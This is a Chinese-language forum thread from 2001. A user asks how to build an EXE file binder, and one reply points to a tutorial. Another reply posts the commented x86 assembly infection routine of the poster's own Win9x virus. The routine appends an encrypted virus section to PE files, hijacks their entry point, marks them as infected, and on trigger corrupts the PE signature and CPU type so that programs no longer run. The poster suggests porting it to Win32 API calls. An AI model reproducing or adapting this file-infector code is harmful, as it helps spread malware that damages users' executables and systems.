向高手请教文件捆绑的问题100(100分)

ailine · 2001-06-25

就是exe文件捆绑机,高手们能讨论一下么???最好能写一些代码,加点注释,如果有相关源代码请mail我一份 txyqbf@21cn.com,分数好说,多少说话就行!!!

jingtao · 2001-07-06

我已经就捆绑、自解压文件等写了一个教程。 如果没有意外《电脑商情报》7。10开始连载，请留意。

codes · 2001-07-06

基本上此类程序和病毒的编写相似,而且,如果你要将一个文件作为宿主在修改其开始代码 使他先运行另一个别捆绑的程序,这样就可以做到不改变宿主程序的图标,我原来写过一个 不过不止扔到哪里去了,我手边只有这段代码(不是捆绑机的,而是 my virus 的 infect 部分,看看也许对你有益: INFECT_PE_FILE: ; ADD INFECT PE FILE CODES HERE!!!!!!! XOR EAX,EAX ; 清 eax ; 清 MY SECTION 内容 LEA EDI,EBP[NEWOBJ-MYHOOKAPI] MOV ECX,0AH CLD REP STOSD ; 设置 MY SECTION 属性 MOV DWORD PTR [EDI-4],0C0000040H LEA EDI,EBP[FILEOP-MYHOOKAPI] ; 得到 IFSMgr_Ring0_FileIO 的地址 MOV AX,R0_FILEATTRIBUTES ; 功能号: 取文件属性 CALL EDI ; GET OLD FILE ATTRIB JC EXIT_INFECT ; 出错,放弃感染 MOV DR3,ECX ; SAVE THE FILE ATTRIB TO => DR1 XOR ECX,ECX ; 功能号: 置文件属性 MOV AX,R0_FILEATTRIBUTES+01H CALL EDI ; SET COMMON FILE ATTRIB JC EXIT_INFECT XOR EAX,EAX ; 清 eax MOV EAX,R0_OPENCREATFILE ; 打开文件 XOR ECX,ECX MOV EDX,01H MOV EBX,02H ; 同 int 21h (function 6ch) LEA ESI,EBP[BUF-MYHOOKAPI] ; 文件名 CALL EDI JC RETURN_ATTRIB XCHG EAX,EBX ; SAVE FILE HANDLE TO EBX MOV EAX,R0_READFILE ; FILE OPERATION READ LEA ESI,EBP[PESTART-MYHOOKAPI] ; READ BUFFER XOR ECX,ECX MOV CL,04H ; READ 4 BYTES TO BUF XOR EDX,EDX MOV DL,3CH ; READ FROM OFFSET:  3CH CALL EDI JC CLOSEFILE MOV EDX,EBP[PESTART-MYHOOKAPI] ; READ FROM OFFSET MOV EAX,R0_READFILE ; READ FILE LEA ESI,EBP[PEHEADER-MYHOOKAPI] ; READ BUFFER MOV ECX,500H ; READ LENGTH CALL EDI ; READ PE_HEADER JC CLOSEFILE CMP DWORD PTR EBP[PESIGN-MYHOOKAPI],4550H ; PE 文件格式? JNZ CLOSEFILE ; 不是,放弃感染 CMP WORD PTR EBP[PESIGN-MYHOOKAPI+1AH],0FFFFH ; 感染了吗? JZ CLOSEFILE ; 是的,放弃感染 MOV WORD PTR EBP[PESIGN-MYHOOKAPI+1AH],0FFFFH ; SET INFECTED MASK PUSHAD ; 保存全部寄存器 ;========================================= ; USEFUL DATA: ; EBX - OPEN FILE HANDLE ; EDI - FILEOP FUNCTION ; EBP - OFFSET ;========================================= ; LOCAL THE OBJECT TABLE XOR EAX,EAX ; 清 eax MOV AX,EBP[NTHEADERSIZE-MYHOOKAPI] ; 得到 Optional Header 的大小 ADD EAX,18H ; 加上 18h, EAX - PE 文件头大小 MOV EBP[OBJTABOFFSET-MYHOOKAPI],EAX ; CALCULATE THE OBJECT TABLE OFFSET LEA EAX,EBP[PEHEADER-MYHOOKAPI] ; 取得 peheader 在内存中的偏移 ADD EBP[OBJTABOFFSET-MYHOOKAPI],EAX ; 计算并定位 object table 的偏移 ; END OF LOCAL XOR EAX,EAX ; 清 eax XOR EDX,EDX ; 清 edx MOV AX,EBP[NUMOBJ-MYHOOKAPI] ; GET THE NUMBER OF OBJECT MOV ECX,40 ; 取得我的 section 在 peheader 中的开始地址 MUL ECX ; NOW THE [EDX:EAX] SAVE THE MY OBJECT ENTRY MOV ESI,EBP[OBJTABOFFSET-MYHOOKAPI] ; OBJECT TABLE ENTRY POINT ADD ESI,EAX ; CALCULATE MY OBJECT IN PEHEADER INC WORD PTR EBP[NUMOBJ-MYHOOKAPI] ; object number + 1 ;============================================= ; ESI: MY OBJ IN PEHEADER ; EDI: MY OBJ ;============================================= MOV EAX,[ESI-40+8] ; 得到原最后一个 section 的 virtualsize ADD EAX,[ESI-40+12] ; 得到原最后一个 section 的 virtualoffset ; CALCULATE MY SECTION IN MEMORY 计算我的段的 virtualsize & virtualoffset MOV ECX,EBP[OBJALIGN-MYHOOKAPI] ; ecx - 内存中的段对齐方式 XOR EDX,EDX ; 清 edx DIV ECX ; 计算我的段的 RVA OR EDX,EDX JZ VCON1 INC EAX VCON1: MUL ECX MOV EBP[RVA-MYHOOKAPI],EAX ; 保存我的段的 RVA XOR EDX,EDX ; 清 EDX MOV EAX,OFFSET VIRMEMORYSIZE-VIRSTART ; 计算我的段的 VIRTUALSIZE DIV ECX OR EDX,EDX JZ VCON2 INC EAX VCON2: MUL ECX MOV EBP[VIRTUALSIZE-MYHOOKAPI],EAX ; CALCULATE MY SECTION IN PHYSICAL FILE MOV ECX,EBP[FILEALIGN-MYHOOKAPI] ; 计算我的段的 PHYSICALSIZE XOR EDX,EDX MOV EAX,EBP[VIR_ENCRY_LENGTH-MYHOOKAPI] DIV ECX OR EDX,EDX JZ VCON3 INC EAX VCON3: MUL ECX MOV EBP[PHYSICALSIZE-MYHOOKAPI],EAX MOV EAX,[ESI-40+16] ADD EAX,[ESI-40+20] XOR EDX,EDX ; 计算我的段的 PHYSICALOFFSET DIV ECX OR EDX,EDX JZ VCON4 INC EAX VCON4: MUL ECX MOV EBP[PHYSICALOFFSET-MYHOOKAPI],EAX ; CALCULATE THE IMAGESIZE AND ENTRYPOINT MOV ECX,EBP[OBJALIGN-MYHOOKAPI] ; 计算新的 IMAGESIZE MOV EAX,EBP[IMAGESIZE-MYHOOKAPI] ADD EAX,OFFSET VIRMEMORYSIZE-VIRSTART DIV ECX OR EDX,EDX JZ VCON5 INC EAX VCON5: MUL ECX MOV EBP[IMAGESIZE-MYHOOKAPI],EAX ; SAVE MY OLD SECTION TO IMAGE LEA EDI,EBP[NEWOBJ-MYHOOKAPI] ; EDI - 我的段的地址 XCHG EDI,ESI ; ESI - 我的段的地址,EDI - PEHEADER 中我的段的入口地址 MOV ECX,10 ; 搬移字节数 10*4 CLD REP MOVSD ; 搬过去 ; CALCULATE RVA, MAKE SURE MY CUTE VIRUS RUN FIRST! ^O^ MOV EAX,EBP[RVA-MYHOOKAPI] ; 计算新的 ENTRYPOINTRVA MOV EBX,EBP[ENTRYPOINTRVA-MYHOOKAPI] ; 保存原来的偏移到 OLDENTRYPOINT MOV EBP[ENTRYPOINTRVA-MYHOOKAPI],EAX MOV ECX,EBP[IMAGEBASE-MYHOOKAPI] ADD EBX,ECX MOV EBP[OLDENTRYPOINT-MYHOOKAPI],EBX PUSHAD CALL ENCRYATION_MYSELF ADD EAX,ECX ; VIR START IN MEMORY MOV EDI,EBP[USED_OFFSET-MYHOOKAPI] ADD [EDI],EAX POPAD CALL CHECKTRIGGER OR EAX,EAX JZ VCON6 ; Make 'PE' File To 'MZ' File, and Show My Cute Virus Name ! MOV DWORD PTR EBP[PESIGN-MYHOOKAPI],NOT(92350209H) ; Replace 'PE' Sign ; Change CPU Type ( 014C h => 014D h ), Stop Win App Run! MOV WORD PTR EBP[CPUTYPE-MYHOOKAPI],014DH VCON6: POPAD ; 全局出栈 MOV EAX,R0_WRITEFILE ; 写 PE HEADER MOV ECX,500H MOV EDX,EBP[PESTART-MYHOOKAPI] LEA ESI,EBP[PEHEADER-MYHOOKAPI] CALL EDI ; WRITE NEW PE HEADER TO FILE JC CLOSEFILE MOV EAX,R0_WRITEFILE ; 写 VIRUS BODY MOV ECX,EBP[VIR_ENCRY_LENGTH-MYHOOKAPI] MOV EDX,EBP[PHYSICALOFFSET-MYHOOKAPI] LEA ESI,EBP[VIR_ENCRY_START-MYHOOKAPI] CALL EDI ; Change Dos Sub Header Message! CALL CHECKTRIGGER OR EAX,EAX JZ CLOSEFILE MOV EAX,R0_WRITEFILE XOR ECX,ECX INC ECX INC ECX INC ECX INC ECX LEA ESI,EBP[PESTART-MYHOOKAPI] MOV DWORD PTR [ESI],20202020H MOV EDX,04EH CALL EDI CALL NOTMSG MOV EAX,R0_WRITEFILE MOV ECX,14 LEA ESI,EBP[MSG-MYHOOKAPI] MOV EDX,04EH+04H CALL EDI CALL NOTMSG CLOSEFILE: MOV EAX,R0_CLOSEFILE ; 关档 CALL EDI RETURN_ATTRIB: MOV EAX,DR3 ; 恢复文件属性 MOV ECX,EAX MOV AX,R0_FILEATTRIBUTES+1 LEA ESI,EBP[BUF-MYHOOKAPI] CALL EDI EXIT_INFECT: CANCELACTION: MOV BYTE PTR EBP[MYFLAG-MYHOOKAPI],0 ; 设置忙位为零 MOV EAX,EBP[OLDHOOKAPI-MYHOOKAPI] ; 得到旧的 FILESYSTEMAPIHOOK 入口 MOV DR1,EAX ; 暂存到 DR1 POPAD ; 全局出栈 MOV EAX,DR1 ; 将 DR1 ( 旧的 FILESYSTEMAPIHOOK ) 返回 EAX JMP [EAX] 别忘了将这里的 vxd 调用换为 api 调用(具体函数不用我说了吧?_lcreat,CreateFileEx 随便)

kingkong · 2001-08-19

关注

ailine · 2001-08-21

多人接受答案了。

向高手请教文件捆绑的问题100(100分)

ailine

Unregistered / Unconfirmed

jingtao

Unregistered / Unconfirmed

codes

Unregistered / Unconfirmed

kingkong

Unregistered / Unconfirmed

ailine

Unregistered / Unconfirmed

Similar threads